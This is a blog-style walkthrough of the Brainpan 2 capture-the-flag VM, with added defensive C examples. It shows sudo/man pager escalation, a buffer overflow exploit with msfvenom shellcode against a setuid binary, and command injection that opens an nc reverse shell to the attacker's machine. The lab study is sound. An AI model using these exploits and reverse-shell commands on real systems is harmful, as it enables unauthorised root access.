# Cmnd alias specification

#  User  privilege  specification root    ALL=(ALL:ALL) ALL anan‐
si  ALL=NOPASSWD:                    /home/anansi/bin/anansi_util
puck    ALL=NOPASSWD:  /home/anansi/bin/anansi_util  # Members of
the admin group may gain root privileges %admin ALL=(ALL) ALL

# Allow members of  group  sudo  to  execute  any  command  #%su‐
do  ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:
 Manual page sudoers line 1 (press h for help or q to quit)q
puck@brainpan:/etc$
I had a hunch that there's more here than meets the eye. I searched Google for tricks with "man" and guess what I found here:
3. Test commands without leaving the man page. Another cool trick is to use ! if you want to try something you just read in the man page. The best part is that you don't have to close the man page or open another terminal. Type ! and next type the command you want to try. Once finished hit Enter to go back to the man page.
Yes, that means I can do:
>_ term
puck@brainpan:/etc$ sudo /home/anansi/bin/anansi_util manual vi
sudo /home/anansi/bin/anansi_util manual vi
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
VIM(1)                                                                  VIM(1)

NAME
       vim - Vi IMproved, a programmers text editor

SYNOPSIS
       vim [options] [file ..]
       vim [options] -
       vim [options] -t tag
       vim [options] -q [errorfile]

       ex
       view
       gvim gview evim eview
       rvim rview rgvim rgview

DESCRIPTION
       Vim  is a text editor that is upwards compatible to Vi.  It can be used
       to edit all kinds of plain text.  It is especially useful  for  editing
       programs.

       There  are a lot of enhancements above Vi: multi level undo, multi win‐
       dows and buffers, syntax highlighting, command line  editing,  filename
 Manual page vi(1) line 1 (press h for help or q to quit)e
       completion,   on-line   help,   visual  selection,  etc..   See  ":help
       vi_diff.txt" for a summary of the differences between Vim and Vi.
 Manual page vi(1) line 5 (press h for help or q to quit)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/home/puck# whoami
whoami
root
root@brainpan:/home/puck#

and enjoy my fresh new root :) Just so you know...there's another way to gain root, but that's a topic for another story.

Wednesday, 11 June 2014

PENTEST LAB - BRAINPAN: 2 (part II: looking for root)

This is part II of the "Pentest Lab" in which I'm presenting my fight with "Brainpan:2". In the first part I gained access to the machine. Now it's time to get root. I'm logged in as user "anansi" using a reverse shell spawned from the custom app running on port 9999. Let's have a look inside the home folder.







!!!SPOILER ALERT!!!
 If you want to finish this challenge alone stop reading here.






>_ term
anansi@brainpan2:/opt$ cd /home
cd /home
anansi@brainpan2:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Nov  4  2013 .
drwxr-xr-x 22 root    root    4096 Nov  5  2013 ..
drwx------  2 anansi  anansi  4096 Jun  6 07:03 anansi
drwx------  4 puck    puck    4096 Nov  5  2013 puck
drwxr-xr-x  3 reynard reynard 4096 Nov  7  2013 reynard
anansi@brainpan2:/home$ cd anansi
cd anansi
anansi@brainpan2:~$ ls -la
ls -la
total 28
drwx------ 2 anansi anansi 4096 Jun  6 07:03 .
drwxr-xr-x 5 root   root   4096 Nov  4  2013 ..
-rw------- 1 anansi anansi    0 Nov  5  2013 .bash_history
-rw-r--r-- 1 anansi anansi  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 anansi anansi 3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 anansi anansi  675 Nov  4  2013 .profile
-rw-r--r-- 1 anansi anansi   22 Jun  6 07:03 somefilename
-rwxr-xr-x 1 anansi anansi  114 Nov  4  2013 startbrainpan.sh
anansi@brainpan2:~$ cd ..
cd ..
anansi@brainpan2:/home$ ls
ls
anansi  puck  reynard
anansi@brainpan2:/home$ cd reynard
cd reynard
anansi@brainpan2:/home/reynard$ ls -la
ls -la
total 44
drwxr-xr-x 3 reynard reynard 4096 Nov  7  2013 .
drwxr-xr-x 5 root    root    4096 Nov  4  2013 ..
-rw------- 1 reynard reynard    0 Nov  7  2013 .bash_history
-rw-r--r-- 1 reynard reynard  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 reynard reynard 3392 Nov  4  2013 .bashrc
-rwsr-xr-x 1 root    root    8999 Nov  6  2013 msg_root
-rw-r--r-- 1 reynard reynard  675 Nov  4  2013 .profile
-rw-r--r-- 1 reynard reynard  154 Nov  5  2013 readme.txt
-rwxr-xr-x 1 reynard reynard  137 Nov  4  2013 startweb.sh
drwxr-xr-x 3 reynard reynard 4096 Nov  4  2013 web
anansi@brainpan2:/home/reynard$ ./msg_root
./msg_root
usage: msg_root username message
Nothing interesting in anansi's folder, but I could access reynard's home folder and found an interesting app there. I started SimpleHTTPServer inside his folder and downloaded the binary.
>_ term
anansi@brainpan2:/home/reynard$ python -m SimpleHTTPServer 12000
python -m SimpleHTTPServer 12000
Serving HTTP on 0.0.0.0 port 12000 ...
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET / HTTP/1.1" 200 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:11] "GET /msg_root HTTP/1.1" 200 -
At this point I knew there was probably some way to exploit that binary. Why? That's why:
>_ term
anansi@brainpan2:/home/reynard$ ./msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa                   
Segmentation fault
anansi@brainpan2:/home/reynard$
Let's do some reverse engineering.
>_ term
$ gdb msg_root
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/..../msg_root...done.
(gdb) r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Starting program: /home/..../brainpan2/msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x0804872e in get_name (u=0xffffd5c3 'a' <repeats 108 times>, m=0xffffd630 'a' <repeats 87 times>) at msg_root.c:26
#2  0x0804877b in main (argc=3, argv=0xffffd434) at msg_root.c:35
I checked the file in hte and found these functions inside:
- save_msg
- get_name
- main
When the app is executed the call chain is main -> get_name -> save_msg. Looking at the backtrace from the crash I noticed the address 0x0804872e, which is inside get_name. Disassembling this function gives the code below:
>_ term
Dump of assembler code for function get_name:
   0x080486a1 <+0>:    push   %ebp
   0x080486a2 <+1>:    mov    %esp,%ebp
   0x080486a4 <+3>:    sub    $0x20,%esp
   0x080486a7 <+6>:    movl   $0x804863c,-0x4(%ebp)
   0x080486ae <+13>:    mov    0x8(%ebp),%eax
   0x080486b1 <+16>:    mov    %eax,(%esp)
   0x080486b4 <+19>:    call   0x8048500 <strlen@plt>
   0x080486b9 <+24>:    cmp    $0x11,%eax
   0x080486bc <+27>:    ja     0x80486d2 <get_name+49>
   0x080486be <+29>:    mov    0x8(%ebp),%eax
   0x080486c1 <+32>:    mov    %eax,0x4(%esp)
   0x080486c5 <+36>:    lea    -0x12(%ebp),%eax
   0x080486c8 <+39>:    mov    %eax,(%esp)
   0x080486cb <+42>:    call   0x80484b0 <strcpy@plt>
   0x080486d0 <+47>:    jmp    0x80486ec <get_name+75>
   0x080486d2 <+49>:    movl   $0x12,0x8(%esp)
   0x080486da <+57>:    mov    0x8(%ebp),%eax
   0x080486dd <+60>:    mov    %eax,0x4(%esp)
   0x080486e1 <+64>:    lea    -0x12(%ebp),%eax
   0x080486e4 <+67>:    mov    %eax,(%esp)
   0x080486e7 <+70>:    call   0x8048540 <strncpy@plt>
   0x080486ec <+75>:    movl   $0x7d0,(%esp)
   0x080486f3 <+82>:    call   0x80484c0 <malloc@plt>
   0x080486f8 <+87>:    mov    %eax,-0x8(%ebp)
   0x080486fb <+90>:    mov    0xc(%ebp),%eax
   0x080486fe <+93>:    mov    %eax,(%esp)
   0x08048701 <+96>:    call   0x8048500 <strlen@plt>
   0x08048706 <+101>:    mov    %eax,0x8(%esp)
   0x0804870a <+105>:    mov    0xc(%ebp),%eax
   0x0804870d <+108>:    mov    %eax,0x4(%esp)
   0x08048711 <+112>:    mov    -0x8(%ebp),%eax
   0x08048714 <+115>:    mov    %eax,(%esp)
   0x08048717 <+118>:    call   0x8048540 <strncpy@plt>
   0x0804871c <+123>:    mov    -0x8(%ebp),%eax
   0x0804871f <+126>:    mov    %eax,0x4(%esp)
   0x08048723 <+130>:    lea    -0x12(%ebp),%eax
   0x08048726 <+133>:    mov    %eax,(%esp)
=> 0x08048729 <+136>:    mov    -0x4(%ebp),%eax
   0x0804872c <+139>:    call   *%eax
   0x0804872e <+141>:    mov    -0x8(%ebp),%eax
   0x08048731 <+144>:    mov    %eax,(%esp)
   0x08048734 <+147>:    call   0x8048490 <free@plt>
   0x08048739 <+152>:    leave
   0x0804873a <+153>:    ret  
End of assembler dump.
The arrow points at the instruction that loads the value stored 4 bytes below ebp into eax; the next instruction then calls through eax. Here's how this looks when the user provides valid input:
>_ term
 Breakpoint 2, 0x08048729 in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3f8    0xffffd3f8
eax            0xffffd3e6    -11290
(gdb) x $ebp-4
0xffffd3f4:    0x0804863c
(gdb) x/12xw $esp
0xffffd3d8:    0xffffd3e6    0x0804a008    0x00000012    0x6161d4b4
0xffffd3e8:    0x61616161    0xffff0061    0x0804a008    0x0804863c
0xffffd3f8:    0xffffd408    0x0804877b    0xffffd644    0xffffd64c
You can see a few 0x61 bytes, which correspond to "aaaaaaa". The command x $ebp-4 shows what will be loaded into eax: address 0x0804863c, which is where the save_msg function starts. Checking address 0x0804a008, stored at ebp-8, shows that this is the memory where the second argument is copied (in my case a few b's, 0x62 below):
>_ term
(gdb) x/8xw 0x0804a008
0x804a008:    0x62626262    0x62626262    0x62626262    0x62626262
0x804a018:    0x00006262    0x00000000    0x00000000    0x00000000
Moving further:
(gdb) s

Breakpoint 3, 0x0804872c in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3f8    0xffffd3f8
eax            0x804863c    134514236
You can see that eax now points to save_msg. By providing a long first argument one can overwrite the memory that gets loaded into eax and thus crash the app, as shown below:
>_ term
Breakpoint 2, 0x08048729 in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) x/16xw $esp
0xffffd3a8:    0xffffd3b6    0x0804a008    0x00000012    0x6161d484
0xffffd3b8:    0x61616161    0x61616161    0x0804a008    0x61616161
0xffffd3c8:    0xffffd3d8    0x0804877b    0xffffd60c    0xffffd64c
0xffffd3d8:    0xffffd458    0xf7e6ee46    0x00000003    0xffffd484
(gdb) i r ebp eax
ebp            0xffffd3c8    0xffffd3c8
eax            0xffffd3b6    -11338
(gdb) s

Breakpoint 3, 0x0804872c in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3c8    0xffffd3c8
eax            0x61616161    1633771873
(gdb) s

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
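What the dumps above show, as an added C model that is not part of the original post or of the msg_root binary: the three locals laid out exactly as gdb reports them, the copy the disassembly performs, and a destination-bounded replacement that leaves the function pointer alone. The struct layout, the 10-byte buffer size (the gap between ebp-0x12 and ebp-8) and the helper names are my assumptions derived from the disassembly.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* Locals of get_name as the gdb dumps show them: name buffer at ebp-0x12, the
 * malloc'd message pointer at ebp-8, the save_msg function pointer at ebp-4.
 * Packing reproduces that 18-byte layout on any host (values read back little-endian). */
struct get_name_frame {
    char     name[10];   /* ebp-0x12 .. ebp-0x9 (assumed size: the gap below the pointers) */
    uint32_t msg;        /* ebp-0x8 */
    uint32_t handler;    /* ebp-0x4, initialised to save_msg = 0x0804863c */
} __attribute__((packed));

#define SAVE_MSG_ADDR 0x0804863cu

/* The copy the disassembly performs: strcpy for up to 17 characters (cmp $0x11 /
 * ja), strncpy(name, u, 0x12) beyond that. Either branch writes up to 18 bytes
 * into a 10-byte buffer, so the length check protects nothing above it.
 * The write stays inside the struct, so this model itself is well-defined C. */
static void copy_name_as_binary_does(struct get_name_frame *f, const char *u)
{
    size_t len = strlen(u);
    size_t n = len > 17 ? 18 : len + 1;
    memcpy((unsigned char *)f, u, n);   /* name sits at offset 0 of the frame */
}

/* The fix: bound by the destination size, always NUL-terminate, report truncation. */
static int copy_name_bounded(struct get_name_frame *f, const char *u)
{
    size_t len = strlen(u);
    int truncated = len >= sizeof f->name;
    if (truncated)
        len = sizeof f->name - 1;
    memcpy(f->name, u, len);
    f->name[len] = '\0';
    return truncated;
}

/* Feed a name of name_len copies of fill through one of the two copies and
 * return what is left in the handler slot (0x61616161 = overwritten by 'a'). */
uint32_t handler_after_input(size_t name_len, char fill, int bounded)
{
    char u[256];
    struct get_name_frame f = { {0}, 0x0804a008u, SAVE_MSG_ADDR };  /* heap pointer from the dump */
    if (name_len > sizeof u - 1) name_len = sizeof u - 1;
    memset(u, fill, name_len);
    u[name_len] = '\0';
    if (bounded) copy_name_bounded(&f, u);
    else copy_name_as_binary_does(&f, u);
    return f.handler;
}
```

Even the "short" strcpy branch reaches the pointer: 17 characters plus the terminator already replace its low three bytes.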
Armed with that knowledge I started the exploitation phase. My idea was simple: provide the address of the shellcode in the first argument while placing the shellcode itself in the second one. So the first argument can just be 0x0804a008 repeated a few times, which gives me:

For the second argument I needed shellcode. You can find one online or generate it with msfvenom:
>_ term
$ msfvenom -p linux/x86/exec CMD="/bin/sh" -b "x00" -f py
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 70 (iteration=0)
buf =  ""
buf += "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2"
buf += "\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01"
buf += "\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70"
buf += "\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d"
buf += "\x3d\xd4\x0e\x4c\x41"
Here's the second argument:
And the command in action:
>_ term
anansi@brainpan2:/home/reynard$ ./msg_root `perl -e 'print "\x04\x08\x08\xa0"x8;'` `perl -e 'print "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`
<x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`    
$ id
id
uid=1000(anansi) gid=1000(anansi) euid=104(root) groups=106(root),50(staff),1000(anansi)
$ cd /root
cd /root
$ ls -la
ls -la
total 28
drwx------  3 root  root  4096 Nov  5  2013 .
drwxr-xr-x 22 root  root  4096 Nov  5  2013 ..
drwx------  2 root  root  4096 Nov  4  2013 .aptitude
-rw-------  1 root  root     0 Nov  5  2013 .bash_history
-rw-r--r--  1 root  root   589 Nov  5  2013 .bashrc
-rw-r--r--  1 root  root   159 Nov  5  2013 .profile
-rw-------  1 root  root   461 Nov  5  2013 flag.txt
-rw-------  1 root  root   245 Nov  5  2013 whatif.txt
$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
$ cat whatif.txt
cat whatif.txt

       WHAT IF I TOLD YOU
              ___
            /     \
           | ______\
          (, \_/ \_/
           |   ._. |
           \   --- /
           /`-.__.'
      .---'`-.___|\___
     /                `.

       YOU ARE NOT ROOT?
$ ls -n
ls -n
total 8
-rw------- 1   0   0 461 Nov  5  2013 flag.txt
-rw------- 1 104 106 245 Nov  5  2013 whatif.txt
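The ls -n output reveals two different owners (uid 0 and uid 104) that both print as root. As an added check that is not part of the original post, this flags that kind of account in a passwd(5) file: names with non-portable characters and names that collide once whitespace is trimmed. The demo_passwd text is constructed here to mirror the box, not copied from it.

```c
#include <ctype.h>
#include <string.h>
/* Constructed passwd(5) sample mirroring the box: uid 0 is "root " with a
 * trailing space, the plain "root" is the decoy uid 104. */
const char demo_passwd[] =
    "root :x:0:0:root:/root:/bin/bash\n"
    "anansi:x:1000:1000::/home/anansi:/bin/bash\n"
    "root:x:104:106::/root:/bin/bash\n"
    "puck:x:1001:1001::/home/puck:/bin/bash\n";

/* Suspicious: characters outside the portable set [A-Za-z0-9._-], e.g. the space in "root ". */
int suspicious_login_name(const char *name)
{
    for (; *name; name++)
        if (!isalnum((unsigned char)*name) && !strchr("._-", *name))
            return 1;
    return 0;
}

/* Copy name into out with surrounding whitespace removed. */
static void trimmed_name(const char *name, char *out, size_t outsz)
{
    while (isspace((unsigned char)*name)) name++;
    size_t len = strlen(name);
    while (len && isspace((unsigned char)name[len - 1])) len--;
    if (len >= outsz) len = outsz - 1;
    memcpy(out, name, len);
    out[len] = '\0';
}

#define MAX_ENTRIES 128
#define NAME_LEN 64
/* Count pairs of passwd entries whose names are identical once trimmed, such as
 * "root" and "root ". Returns -1 if the text has more than MAX_ENTRIES entries. */
int count_lookalike_accounts(const char *passwd)
{
    char names[MAX_ENTRIES][NAME_LEN], raw[NAME_LEN];
    int n = 0, pairs = 0, i, j;
    for (const char *p = passwd; *p; p += strcspn(p, "\n"), p += (*p == '\n')) {
        size_t field = strcspn(p, ":\n");   /* login name is the first field */
        if (field == 0) continue;           /* blank line or empty name */
        if (n == MAX_ENTRIES) return -1;
        if (field >= sizeof raw) field = sizeof raw - 1;
        memcpy(raw, p, field); raw[field] = '\0';
        trimmed_name(raw, names[n++], NAME_LEN);
    }
    for (i = 0; i < n; i++)
        for (j = i + 1; j < n; j++)
            if (strcmp(names[i], names[j]) == 0) pairs++;
    return pairs;
}
```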
I must say, the trick with the root account is a nice one. There are two accounts, one named "root" and the other "root " (with a space at the end). The second one is the real root here. There was still a long road ahead of me... I looked for SUID/SGID executables:
>_ term
$ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
...
/opt/old/brainpan-1.8/brainpan-1.8.exe
...
This one in the /opt folder caught my attention. I found some files in that folder:
$ ls -la
ls -la
total 36
drwxrwxr-x 2 root  staff  4096 Nov  5  2013 .
drwx------ 3 root  root   4096 Nov  4  2013 ..
-rwsr-xr-x 1 puck  puck  17734 Nov  4  2013 brainpan-1.8.exe
-rw-r--r-- 1 puck  puck   1227 Nov  5  2013 brainpan.7
-rw-rw-rw- 1 puck  staff    27 Nov  5  2013 brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=127.0.0.1
Let's modify the cfg so the app listens on all addresses:
$ echo "port=9333" > brainpan.cfg
echo "port=9333" > brainpan.cfg
$ echo "ipaddr=0.0.0.0" >> brainpan.cfg
echo "ipaddr=0.0.0.0" >> brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=0.0.0.0
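A world-writable brainpan.cfg read by a setuid binary is what makes this step possible. As an added example that is not the project's code, this is the check such a program should run on its configuration before acting on anything in it, with a scratch-file demo; the expected-owner rule is my assumption about how the program would be deployed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Check a setuid program should make on its configuration before trusting it:
 * a regular file, owned by the account the program expects, and not writable by
 * group or others. brainpan.cfg (-rw-rw-rw-, group staff) fails the last test,
 * which is what let an unprivileged user rebind the listener. */
int config_is_trusted(int fd, uid_t expected_owner)
{
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    if (st.st_uid != expected_owner)
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;
    return 1;
}

/* Demo: create a scratch file with the given permission bits, run the check as
 * the current user and clean up. Returns -1 if the scratch file can't be made. */
int demo_config_trust(mode_t mode)
{
    char path[] = "/tmp/brainpan-cfg-XXXXXX";   /* scratch path, not the box's file */
    int fd = mkstemp(path), ok;
    if (fd < 0)
        return -1;
    if (fchmod(fd, mode) != 0)
        ok = -1;
    else
        ok = config_is_trusted(fd, getuid());
    close(fd);
    unlink(path);
    return ok;
}
```

Checking the open descriptor with fstat, rather than the path with stat, avoids a swap of the file between the check and the read.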
I started the app and connected from my machine:
>_ term
$ nc 192.168.57.10 9444
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[______________________ WELCOME TO BRAINPAN 1.8________________________]
                             LOGIN AS GUEST                            

                          >> GUEST
                          ACCESS GRANTED


                             *  *  *  *                               
    THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED. 
    TYPE "TELL ME MORE" FOR A LIST OF COMMANDS. 
                             *  *  *  *                               

                          >> VIEW
    ENTER FILE TO DOWNLOAD: a; nc -e /bin/sh 192.168.57.1 5600
>_ term
$ nc -l -p 5600 -v
nc: listening on :: 5600 ...
nc: listening on 0.0.0.0 5600 ...
nc: connect to 192.168.57.1 5600 from 192.168.57.10 (192.168.57.10) 41003 [41003]
id
uid=1000(anansi) gid=1000(anansi) euid=1001(puck) groups=1001(puck),50(staff),1000(anansi)
We are almost the user "puck". There are a few ways to change our uid from 1000 to 1001. I showed one in this post, and here it is in action:
>_ term
python -c 'import os,pty;os.setresuid(1001,1001,1001);pty.spawn("/bin/bash");'
puck@brainpan2:/opt/old/brainpan-1.8$ whoami
whoami
puck
puck@brainpan2:/opt/old/brainpan-1.8$ id
id
uid=1001(puck) gid=1000(anansi) groups=1001(puck),50(staff),1000(anansi)
puck@brainpan2:/opt/old/brainpan-1.8$
Let's check puck's folder:
>_ term
puck@brainpan2:/opt/old/brainpan-1.8$ cd /home
cd /home
puck@brainpan2:/home$ cd puck
cd puck
puck@brainpan2:/home/puck$ ls -la
ls -la
total 28
drwx------ 4 puck  puck  4096 Nov  5  2013 .
drwxr-xr-x 5 root  root  4096 Nov  4  2013 ..
drwxr-xr-x 3 puck  puck  4096 Nov  5  2013 .backup
-rw------- 1 puck  puck     0 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck  puck   220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck  puck  3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck  puck   675 Nov  4  2013 .profile
drwx------ 2 puck  puck  4096 Nov  5  2013 .ssh
Looks clean, but the .backup folder looks suspicious. I checked it:
>_ term
puck@brainpan2:/home/puck$ cd .backup
cd .backup
puck@brainpan2:/home/puck/.backup$ ls -la
ls -la
total 28
drwxr-xr-x 3 puck puck 4096 Nov  5  2013 .
drwx------ 4 puck puck 4096 Nov  5  2013 ..
-rw------- 1 puck puck  395 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck puck  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck puck 3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck puck  675 Nov  4  2013 .profile
drwx------ 2 puck puck 4096 Nov  4  2013 .ssh
A non-empty .bash_history? That's strange:
>_ term
puck@brainpan2:/home/puck/.backup$ cat .bash_history
cat .bash_history
cd /usr/local/bin
ls -l
./msg_root "comment on the latest version please"
cd /opt/brainpan/
ps aux
vi brainpan-1.8.c
cd ../archive
netstat -antp
netstat -antp | grep 9888
cd ..
ls
cd old
ls
cd brainpan-1.8
vi brainpan-1.8.c
ssh -l "root " brainpan2
vi brainpan.7
man ./brainpan.7
ls
htop
top
ls -latr
cat .bash_history
ls
mkdir .backup
mv .ssh .bash* .backup
cd .backup/
ls
clear
ls -latr
exit
puck@brainpan2:/home/puck/.backup$
So user puck can log in as root through ssh. I'm not sure why, but I did this:
>_ term
puck@brainpan2:/home/puck$ mv .ssh .ssh-old
mv .ssh .ssh-old
puck@brainpan2:/home/puck$ cp -rp .backup/.ssh .
cp -rp .backup/.ssh .
puck@brainpan2:/home/puck$ ls -la
ls -la
total 32
drwx------ 5 puck  puck   4096 Jun  6 10:31 .
drwxr-xr-x 5 root  root   4096 Nov  4  2013 ..
drwxr-xr-x 3 puck  puck   4096 Nov  5  2013 .backup
-rw------- 1 puck  puck      0 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck  puck    220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck  puck   3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck  puck    675 Nov  4  2013 .profile
drwx------ 2 puck  anansi 4096 Nov  4  2013 .ssh
drwx------ 2 puck  puck   4096 Nov  5  2013 .ssh-old
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2
ssh -l "root " brainpan2
ssh: connect to host brainpan2 port 22: Connection refused
Either ssh is not running or it's running on a different port.
>_ term
puck@brainpan2:/home/puck$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 2222
...
Got ya!
>_ term
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2 -p 2222
ssh -l "root " brainpan2 -p 2222
The authenticity of host '[brainpan2]:2222 ([127.0.1.1]:2222)' can't be established.
ECDSA key fingerprint is 0a:15:1c:1c:25:b0:fe:54:8a:35:45:e5:b8:02:97:1a.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '[brainpan2]:2222' (ECDSA) to the list of known hosts.
Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov  7 11:00:06 2013
root @brainpan2:~# cat /root/flag.txt
cat /root/flag.txt

                          !!! CONGRATULATIONS !!!

                 You've completed the Brainpan 2 challenge!
                 Or have you...?

                 Yes, you have! Pat yourself on the back. :-)

                 Questions, comments, suggestions for new VM
                 challenges? Let me know!


                 Twitter: <redacted>
                 Email  : <redacted>
                 Web    : http://www.techorganic.com

root @brainpan2:~#
That's all! I must say I really enjoyed this one. There were a few times when I wanted to grab my laptop and teach it to fly, but getting past those moments gave me a lot of satisfaction and new experience. See you soon!